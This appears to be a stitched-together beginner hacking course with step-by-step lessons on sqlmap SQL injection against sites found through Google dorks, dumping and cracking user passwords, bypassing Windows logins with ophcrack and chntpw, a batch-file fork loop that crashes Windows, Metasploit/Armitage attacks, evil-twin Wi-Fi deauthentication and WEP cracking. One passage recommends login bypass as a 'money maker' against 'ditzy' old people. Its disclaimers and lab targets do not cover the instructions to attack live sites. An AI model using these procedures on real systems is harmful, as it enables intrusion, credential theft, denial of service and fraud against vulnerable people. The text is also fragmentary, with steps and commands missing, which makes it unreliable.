Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need
to plug in a wifi device or install drivers. Quitting."
You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless
card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than
Virtual machine in general.
Lesson 7: Sql Injection using SQLMap
Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this
tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its
employees from any legal liability for your actions.
Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies
servers. It is one of the most common ways sites are hacked.
What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting,
over data fetching from the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,
Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.
Support to directly connect to the database without passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based
attack.Support to dump database tables entirely, a range of entries or specific columns as per users choice.
The user can also choose to dump only a range of characters from each columns entry.
Support to search for specific database names, specific tables across all databases or specific columns across
all databases tables. This is useful, for instance, to identify tables containing custom application credentials
where relevant columns names contain string like name and pass.Support to download and upload any file
from the database server underlying file system when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying
operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Support to establish an out-of-band stateful TCP connection between the attacker machine and the database
server underlying operating system. This channel can be an interactive command prompt, a Meterpreter
session or a graphical user interface (VNC) session as per users choice.
Support for database process user privilege escalation via Metasploits Meterpreter getsystem command.
[Source: www.sqlmap.org]
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google
Dorks knows this already, but in case you dont I have put together a number of strings that you can search in
Google. Just copy paste any of the lines in Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every google dork string, you will get huundreds of search results. How do you know which is really
vulnerable to SQLMAP SQL Injection. Theres multiple ways and I am sure people would argue which one is
best but to me the following is the simplest and most conclusive.
Lets say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a
single quotation mark).
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to
a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. Ive obscured everything including URL and page design for
obvious reasons.
Server Error in / Application. Unclosed quotation mark before the character string attack;.
Description: An unhanded exception occurred during the execution of the current web request. Please review
the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string
attack;.
MySQL Errors
Oracle Errors
PostgreSQL Errors
As you can see from the screenshot above, Ive found a SQLMAP SQL Injection vulnerable website. Now I
need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns).
As I am using SQLMAP, it will also tell me which one is vulnerable.
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15)
--dbs = Enumerate DBMS databases
web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved:
information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to
text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost
every MYSQL database. So our interest would be on sqldummywebsitedatabase.
Now we need to know how many tables this sqldummywebsite database got and what are their names. To find
out that information, use the following command:
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web
page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved:
item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO]
retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info
and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table
probably contains username and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP
SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO]
heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved:
user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34]
[INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for target table user_login and user_password.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL
Injection
SQLMAP SQL Injection makes is Easy! Just run the following command again:
[10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password to for this user.. Next shows just that..
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL
Injection
Youre probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to
extract password for the user.
[10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18]
[INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1
entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+
But hang on, this password looks funny. This cant be someones password.. Someone who leaves their
website vulnerable like that just cant have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we
need to decrypt it
So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command
line type in the following command and on prompt paste the hash value:
hash-identifier
First of all I need to know which code to use for DES hashes. So lets check that:
cudahashcat --help | grep DES
So its either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my
laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If youre on VirtualBox or
VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in
Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in its help menu).
However both cudaHashcat and oclHashcat found and cracked the key.
24iYBc17xK0e.:abc123
This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold,
to citizens and old people who are just ditzy. Enjoy.
Insert the USB Live CD and Boot your PC. Make sure the Boot from USB is the first option in the Boot menu at
BIOS.
Boot Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali
Linux initialize and when it loads, it will open a terminal window and navigate to the Windows password
database file
After loading Live kali linux go to the system menu > ophcrack click ok
Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text, its a free Windows password
cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of
the method. If you have a complex password it will take a lot longer than simple passwords, and with the free
tables your password may never be cracked.
Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If
your password isnt cracked, you can also log in as one of the other users with admin rights and then change
your password from within Windows.
With the free tables available you will not be able to crack every password, but the paid tables range from $100
to $1000.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. We simply
need to target this file to retrieve the password
Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM
After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click
choose
Here we can see the saved hashed now with the username and userid.
Now click on Crack button and wait for the password. Its quick and easy
Thats it. Itll show the password , if you unsuccessfully go with free tables. I downloaded the xp free small and
the Vista free tables. Once you have downloaded the tables you will need to unzip them in separate folders. I
made a folder called hash-tables and then made 2 more folders within for each table to unzip to.
Run the program and click on Tables button. Select the table you downloaded and click Install, navigate to
the folder where you unzipped the table, select it and then click ok. You should see green lights next to the
tables you installed.
Navigate to the Windows password database file. Almost all versions of windows password is saved in SAM
file. This file is usually located under /Windows/System32/config. On your system it may look something like
this: /media/hda1/Windows/System32/config.
Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system.
#chntpw -l SAM
The command gives us a list of usernames on the system. When we have the username we want to modify
and we simply run the command chntpw -u username SAM
In the example below we typed: chntpw -u Sanjai sathish SAM and we get the following menu:
We now have the option of clearing the password, changing the password, or promoting the user to
administrator. Changing the password does not always work on Windows 7,8 systems. it may works on XP
system, so it is recommended to clear the password. Therefore you will be able to log in with a blank password.
You can also promote the user to a local administrator as well.
John the Ripper is a fast password cracker, Its primary purpose is to detect weak Unix passwords. Besides
several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box
are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version
John the ripper is a popular dictionary based password cracking tool. It uses a wordlist full of passwords and
then tries to crack a given password hash using each of the password from the wordlist. In other words its
called brute force password cracking and is the most basic form of password cracking. It is also the most time
and cpu consuming technique. More the passwords to try, more the time required.
But still if you want to crack a password locally on your system then john is one of the good tools to try. John is
in the top 10 security tools in Kali linux.
In this topic i am going to show you, how to use the unshadow command along with john to crack the password
of users on a linux system. On linux the username/password details are stored in the following 2 files
#/etc/passwd
#/etc/shadow
The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the
machine. So try to get this file from your own linux system. Or first create a new user with a simple password. I
will create a new user on my linux system named happy, with password chess.
Now that our new user is already created its time to crack his password.
#unshadow
The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with
username and password details. Usage is quite simple.
Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with
john on kali linux. It is located at the following path /usr/share/john/password.lst or you can use your own
password lists too.
Use the show option to display all of the cracked passwords reliably
So in the above command john was able to crack the hash and get us the password chess for the user
happy. Now john was able to crack, only because the password chess was present in the password list. If it
were not there then john would have failed.
Basic Concept
It uses the fact that while a service can be more than sufficient to cater to the demands
of the desired users, a drastic increase in unwelcome users can make the service go
down. Most of us use the words like "This website was down the other day" without
any idea what it actually means. Well now you do. To give you a good idea of what is
happening, I'll take the example from the movie "We Are Legion".
So while this may seem impossible in the real world, in the virtual world, you can
cause as much load as a thousand (or even a million) users alone at the click of a
button. There are many tools out there for this purpose, however, you are not
recommended to use them as a DOS on someone else is illegal, and easy to
detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS
on our own computer.
What basically happened is that the one line command asked the operating system to
keep opening process very fast for an infinite period of time. It just gave up.
Here's something for the Windows Users
Crashing Windows Using Batch file
Open a notepad. Put the following code in it-
:1
Start
goto 1
Save the file as name.bat
Bat here is batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first,
execute the second, and then over to first again, execute the second..... infinitely. So
again, denial of service. All the processing power is used by a useless command,
while you, the legitimate user, can't do anything.
Lesson 10: Introduction to Python
Python is a very diverse programming language and is excellent to learn, today at codingsec we will run
through an introductory tutorial to get you more familiar with how the fundamentals of the language works. The
best way to learn to code is to actually put what you read today in to practice!
Installing Python
In order to get started on learning Python, you will need to install the required software.For Python
programming you need a working Python installation and a text editor.
To download the required software please http://www.python.org/download you will find numerous download
links there. Python is very diverse and compatible what ever operating system you are using.
You are probably lucky and Python is already installed on your machine. To test it typepython3 on a
command line. If you see something like that in the following section, you are set.
If you have to install Python, first try to use the operating systems package manager or go to the repository
where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the
distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after
downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are
not yet the default, so they need to be installed specially.
Download the .tgz file (use your Web browser to get the gzipped tar file
fromhttps://www.python.org/downloads/release/python-341)Uncompress the tar file (put in the correct path to
where you downloaded it):$ tar -xvzf ~/Download/Python-3.4.1.tgz <i>... list of files as they are uncompressed
</i>Change to the directory and tell the computer to compile and install the program$ cd Python-3.4/ $
./configure --prefix=$HOME/python3_install <i> ... lots of output. Watch for error messages here ... </i> $ make
<i> ... even more output. Hopefully no error messages ... </i> $ make installAdd python 3 to your path. You can
test it first by specifying the full path. You should add $HOME/python3_install/bin to your PATH bash variable.$
~/python3_install/bin/python3 Python 3.4.1 (... size and date information ...) [GCC 4.5.2] on linux2 Type "help",
"copyright", "credits" or "license" for more information. >>>
The above commands will install Python 3 to your home directory, which is probably what you want, but if you
skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you
need to make sure that the tk and tcl libraries, together with their development files, are installed on the
system. You will get a warning during the make phase if these are not available.
MAC USERS
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update
to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line
terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install
Python, get the MacOS installer from the Python download site.
WINDOWS USERS
Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel
chip). Start the installer by double-clicking it and follow the prompts.
The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a
program whenever you try to execute one by typing its name at a Command Prompt. You can see the current
value of your PATH by typing this command at a Command Prompt:
echo %PATH%
The easiest way to permanently change environment variables is to bring up the built-in environment variable
editor in Windows. How you get to this editor is slightly different on different versions of Windows.
On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel.
Once youve opened the Control Panel, select View by: Large Icons, then click on System. In the window that
pops up, click the Advanced System Settings link, then click the Environment
Variables... button.
On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse
over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System
Settings link, then click the Environment Variables...button.
On Windows XP: Right-click the My Computer icon on your desktop and selectProperties. Select
the Advanced tab, then click the Environment Variables... button.
Once youve brought up the environment variable editor, youll do the same thing regardless of which version of
Windows youre running. Under System Variables in the bottom half of the editor, find a variable
called PATH. If there is is one, select it and click Edit.... Assuming your Python root is C:\Python34, add
these two folders to your path (and make sure you get the semicolons right; there should be a semicolon
between each folder in the list):
C:\Python34 C:\Python34\Scripts
Note: If you want to double-click and start your Python programs from a Windows folder and not have the
console window disappear, you can add the following code to the bottom of each script:
INTERACTIVE MODE
Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:
Python 3.0 (r30:67503, Dec 29 2008, 21:31:07) [GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2 Type
"copyright", "credits" or "license()" for more information.
**************************************************************** Personal firewall software may warn about the
connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is
not visible on any external interface and no data is sent to or received from the Internet.
**************************************************************** IDLE 3.0 >>>
The >>> is Pythons way of telling you that you are in interactive mode. In interactive mode what you type is
immediately run. Try typing 1+1 in. Python will respond with2. Interactive mode allows you to test out and see
what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and
try them out.
Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that
appears, type the following:
Now save the program: select File from the menu, then Save. Save it as hello.py (you can save it in any folder
you want). Now that it is saved it can be run.
Next run the program by going to Run then Run Module (or if you have an older version of IDLE
use Edit then Run script). This will output Hello, World! on the*Python Shell* window.
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some
things might go wrong unexpectedly. These dont matter as much for programs, but you can have weird
problems if you dont follow them for module names (modules will be discussed later).
Always save the program with the extension .py. Do not put another dot anywhere else in the file name.Only
use standard characters for file names: letters, numbers, dash (-) and underscore (_).White space ( ) should
not be used at all (use underscores instead).Do not use anything other than a letter (particularly no numbers!)
at the beginning of a file name.Do not use non-english characters (such as , , , or ) in your file
namesor, even better, do not use them at all when programming.
If you dont want to use Python from the command line, you dont have to, just use IDLE. To get into interactive
mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a
good Python mode) and then run it with python3 program_name.
If you are using Unix (such as Linux, Mac OS X, or BSD), if you make the program executable with chmod, and
have as the first line:
you can run the python program with ./hello.py like any other command.
Installing Metasploit
Now metasploit is not distributed with Kali Linux (it was distributed with backtrack
though). However, Kali has it on its repositories, and it can be easily downloaded and
installed by executing-
apt-get install armitage
It will check dependencies and download the required file and install Armitage for
you. After its done, you can start armitage by using the following code-
You will get a screen like this. Let the settings be as they are, and click connect.
You'll get a prompt like this (most of the time)
Now you'll see Armitage making some connection for you. For a short while it might
show failure messages (Connection Refused), but after some time Armitage will start.
And you'll end up with a windows somewhat like this
Now while I do believe that the developer has succeeded in making a tool which
permits me to say - "I'll take my leave, you can handle stuff from here", but I'd still go
on for a while, helping you know some basic stuff before I take my leave.
Armitage Basics
Now the tough coding (honestly there wasn't anything tough about that) that you had
to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see
exactly what line of code is actually executed when you do something with your
mouse. As a start, you should do a quick scan with OS detect.
And while it does ask you to enter some stuff now, it is going to be pretty easy, you
just have to follow the example given by armitage with some modification.
First do your old ifconfig on a new terminal to find you IP
ifconfig
Notice that most of the time, the first 6 digits are 192.168. You have to figure out the
next 3 digits. After that, you can enter the ip into the armitage window. Look at the
sample it had provided, just copy that, and, replacing the 1 with 154 as in my case.
You final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs
from 192.168.154.1 to 192.168.154.256. Actually it scans IP from 192.168.xxx.0
through 192.168.xxx.255. Most of the time, you'll find your host in this range,
however, to include all IP from 192.168.0.0 to 192.168.255.255, you may
use 192.168.0.0/16.
Now, after a few seconds, you will see the following message, and it tells you exactly
what you're supposed to do next.
Now a couple of computers with respective OS icons will show up on your screen. As
expected, you'll have to go to Attacks -> Find attacks. There's no rocket science here,
and I'm not putting any more screenshots. After that, right click on the computer you
want to hack, and you'll see an attack option. Select whichever you want to try, enter
the requisites (you learnt how to do Information gathering in the previous Metasploit
tutorials). Everything will be quite easy, except for the fact that the exploits in attack
section will be possible exploits, that might or might not work. If you're expecting a
click to hack you a Windows 7 machine, then that's just not happening. It might work
with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi
one. Good luck with playing around with this tool. And here's the official Armitage
website (media section link, useful vids and pics there) where you might find some
more guidance, though the tool doesn't need any.
Lesson 12: Sql Injection Basics
Introduction
Lets get started at an apparently unrelated point. Lets assume we create a table in
SQL. Now there are three main parts of a database management system, like SQL.
They are -
Creating structure of table
Entering data
Making queries (and getting meaningful results from data)
Now, when SQL is used to display data on a web page, it is common to let web users
input their own queries. For example, if you go to a shopping website to buy a
smartphone, you might want to specify what kind of smartphone you want. The site
would probably be storing data about phones in table with columns like Name, Price,
Company, Screen Size, OS, etc.
Now they allow you to create a query using some sort of user friendly drop down
based form which lets you select your budget, preferred company, etc. So basically,
you, the user, can create queries and request data from their SQL servers.
Now this automated method of creating queries for you is relatively safe, there is
another method of creating queries which can be exploited by us. A url ending in .php
is a direct indication that the website/blog uses sql to deliver a lot of it's data, and that
you can execute queries directly by changing the url. Now basically the data in the
SQL tables is protected. However, when we send some rogue commands to the SQL
server, it doesn't understand what to do, and returns an error. This is a clear indication
that with proper coding, we can send queries that will make the database 'go berserk'
and malfunction, and give us all the otherwise private data of its tables. This attack
can be used to obtain confidential data like a list of username and passwords of all
users on a website.
Steps
1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks.
Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from
the url, and secondly, it should show an error for some kind of query or the
other. An error is an indication of a SQL vulnerability.
2. After we know that a site is vulnerable, we need to execute a few queries to
know what all makes it act in an unexpected manner. Then we should obtain
information about SQL version and the number of tables in database and
columns in the tables.
3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on
this in a later tutorial)
For the 2nd and 3rd step, there are 2 ways to do them-
Manually using some standard codes available online (and if you know SQL then you
can figure most of the stuff out yourself). For example, you can instruct the database
to give you all the data from a table by executing the command-
SELECT * FROM Users WHERE UserId = 105 or 1=1
Now, while the first part of the query "UserID=105" may not be true for all user, the
condition 1=1 will always be true. So basically the query will be prompted to return
all the data about the user for all the users for whom 1=1. Effectively, you have the
username and passwords and all other information about all the users of the website.
The first command is legit and gives you access to data of srinivas only, and only in the condition where the
password is correct. The second statement gives you access to data of all accounts.
Using some tool - Some tools help in making the process easier. You still have to use
commands but using tools is much more practical after you have an idea what is
actually happening. I don't recommend all the GUI Windows tools which are found on
malware filled websites, and never work. All throughout this blog we have used Kali
Linux, and if you really are serious about hacking, there is no reason not to have Kali
linux installed. In Kali linux, there is a great tool called SQLMap that we'll be using.
That's it for this tutorial, you now know how SQL Injections work. It might be worth
your time learning some SQL on W3schools till I come up with some other tutorial.
Lesson 13: More SQLMap
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the --time-sec helps to speed up the process, especially when the
server responses are slow.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which
have to be answered in yes/no. Typing y means yes and n means no. Here are a few
typical questions you might come across-
Some message saying that the database is probably Mysql, so should sqlmap skip all
other tests and conduct mysql tests only. Your answer should be yes (y).
Some message asking you whether or not to use the payloads for specific versions of
Mysql. The answer depends on the situation. If you are unsure, then its usually better
to say yes.
Enumeration
Database
In this step, we will obtain database name, column names and other useful data from
the database.
So first we will get the names of available databases. For this we will add --dbs to our
previous command. The final result will look like -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Table
Now we are obviously interested in acuart database. Information schema can be
thought of as a default table which is present on all your targets, and contains
information about structure of databases, tables, etc., but not the kind of information
we are looking for. It can, however, be useful on a number of occasions. So, now we
will specify the database of interest using -D and tell sqlmap to enlist the tables using
--tables command. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of
columns.
Columns
Now we will specify the database using -D, the table using -T, and then request the
columns using --columns. I hope you guys are starting to get the pattern by now. The
most appealing table here is users. It might contain the username and passwords of
registered users on the website (hackers always look for sensitive data).
The final command must be something like-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --
columns
The result would resemble this-
Data
Now, if you were following along attentively, now we will be getting data from one of
the columns. While that hypothesis is not completely wrong, its time we go one step
ahead. Now we will be getting data from multiple columns. As usual, we will specify
the database with -D, table with -T, and column with -C. We will get all data from
specified columns using --dump. We will enter multiple columns and separate them
with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C
email,name,pass --dump
John Smith, of course. And the password is test. Email is email@email.com?? Okay,
nothing great, but in the real world web pentesting, you can come across more
sensitive data. Under such circumstances, the right thing to do is mail the admin of the
website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark
side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at
other columns and tables and see what you can dig up.
Lesson 14: Evil Twin
You will also need to install a tool (bridge utils) which doesn't come pre-installed in
Kali. No big deal-
apt-get install bridge-utils
Objectives
The whole process can be broken down into the following steps-
1. Finding out about the access point (AP) you want to imitate, and then actually
imitating it (i.e. creating another access point with the same SSID and
everything). We'll use airmon-ngfor finding necessary info about the network,
and airbase-ng to create it's twin.
2. Forcing the client to disconnect from the real AP and connecting to yours.
We'll useaireplay-ng to deauthenticate the client, and strong signal strength to
make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That
basically means that we have to provide internet access to our client after he
has connected to the fake wireless network. For that we will need to have
internet access ourselves, which can be routed to out client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using
metasploit.
PS: The first 3 are primary objectives, the last one is optional and not a part of evil
twin attack as such. It is rather a man in the middle attack. Picture credits
: firewalls.com
Information Gathering - airmon-ng
To see available wireless interfaces-
iwconfig
Note : If you are unable to get your client to connect to you, there is another
option. You can leave him with no options. If you keep transmitting the deauth
packets continuously (i.e. don't press ctrl+c after the client has disconnected), he
will have no choice but to connect to you. However, this is quite an unstable
situation, and the client will go back to the real twin as soon as it gets the chance.
Have fun
Now that the client is using the internet via our evil interface, we can do some evil
stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a
detailed tutorial for it later. However, for the time being, I will give you some idea
what you can do.
For everyone
My Dlink Adapter
This is what it looks like on my Windows machine ( I blurred the names a bit. Its a sort of convention I guess)
What now
Now since we have multiple adapters, we can use one of them to create a wireless
network on Windows and then practice hacking it on a virtual Kali Linux machine.
This is our newly created network. Now we can turn on our Kali machine and see if it
is discovered there.
So it showed up pretty fine. We can use netsh to modify the security parameters as
necessary (WEP, WPA, etc. and practice our hacking skills on our dummy wifi
network)
Lesson 17: Speeding up WEP Hacking in Kali Linux
Now if you have followed the basic WEP hacking tutorial, then you are ready to
proceed to the stage where you follow an intermediate level hacking tutorial. In this
tutorial, we will look at the intricate details of what is happening and approach the
complicated methods and concepts.
1. Are you using Kali Linux on a virtual machine. Please note that a wireless adapter can
only be used by only one machine at a time. Your host machine has access to the
wireless adapter, not the virtual machine. This question has been discussed at length
on superuser forums. The conclusion is that you can't directly connect internal wifi card
using any Virtual machine software-
"Unfortunately no virtualization software allows for direct access to hardware devices
like that.
Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those
programs behave the same way. The only devices that can be directly accessed are
usb devices. Everything else is abstracted though the virtualization engine. (Though
you could argue that the vm has lower level access to cd rom's and storage devices).
I wish I could give you a better answer, than simply to buy a usb wireless card."
Basically you have to buy an external wireless card. They aren't very expensive. I
personally use two of them myself. If you want to see what I use, take a look
here, http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-
hacking.html
So basically you have 2 choices. First, you can buy a new external wireless adapter
(no referral links here). Secondly, you can side install Kali with Windows or run it via
a USB. A virtual machine can only use computer hardware if it is externally
connected via USB. Now there is another catch here. The internal adapters, almost all
of them, don't support injection. This is extremely important for speeding up wireless
hacking. So if you really want to go in depth of wireless hacking, then its time to buy
an external adapter or two (the more the better). If that's not a possibility, you might
want to spend hours trying to get a driver which might make your internal adapter
support injection (I don't know anyone who succeeded in this, but it might be
possible).
Kali Linux
I don't know why it needs mention here, but still, if you don't have Kali Linux (or
Backtrack) installed yet, you will have to install it before you can start this tutorial.
Check Injection Support
Aircrack-ng has a comprehensive article related to checking injection support. You
might check their website out for it. I am just providing the commands which will be
enough to find out whether injectipn is working or not.
airmon-ng start wlan0 [or wlan1]
(Puts your wireless adapter in monitor mode. From now we'll refer to wlan0/wlan1 as
mon0
airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666
This basically sets up a temporary server sort of thing that is waiting for you to test
your injection capabilities. The second command actually tries to inject the server, and
succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when
you are carrying out some command on yourself. 666 is the port we are using. Most of
the time, what follows an IP and a colon is the port. The general form is somewhat
like IP:port. So finally you have checked your injection capabilities, and the last line
- "Injection is working!" should bring a smile to your face. If not, you'll have to buy a
card which supports injection, or see some forum posts which will help you figure
something out.
ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH (channel) - 2
Mac address of genuine users connected to the network:
Interface : wlan1 - referred to as mon0
You should gather the equivalent information for the network you will be working on.
Then just change the values whenever I use them in any of the commands
Note : We need at least one user (wired or wireless) connected to the network
and using it actively. The reason is that this tutorial depends on receiving at least
one ARP request packet and if there are no active clients then there will never be
any ARP request packets.
Now, to check whether the signal strength will be sufficient, we will simply execute
the following code-
airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2
This will make the wireless card only read packets in the channel no. 2, on which our
target network is.
The last time we checked whether the wireless card had the capability to inject
packets. We tested it on our own computer. This time, we actually injected packets
into the target computer. If this worked, then it's pretty good news, and it means that
you are most probably going to be able to hack this network. The last line 30/30 :
100% determines how good the strength of the signal is. A very high percentage is a
good sign, and 100 is ideal.
Capture Packets
Now we have already run airodump-ng a couple of times. However, this time we will
pass the -w command which will instruct airodump-ng to save the output to a file.
airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0
Speeding Things Up
Fake Authentication
Now to speed things up, we will inject the network. We will thus obtain ARP packets.
These packets will fill up the data column of our airodump-ng capture, and data is
what will help us obtain the password. As soon as we have 10000 data packets, we
can start attempting to get the password using aircrack-ng.
Now to make the AP pay attention to your injected packets, you either have to be a
connected client, or have to pretend to be one. You can either mask your mac address
to one of the already connected clients, or use the fake authentication feature. We will
do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y
then go to the bottom of the post for troubleshooting)
aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0
Slow start
The video shows how fast the IVs flowed in after ARP injection started.
Cracking the network
Cracking the network is as easy as typing the following into the console
aircrack-ng name_of_file-01.cap
In our case, the command will be
aircrack-ng dump-01.cap
After pressing enter, you will have a list of networks and you'll be prompted to select
which one of them to hack. In my case there was just one network, so I couldn't get
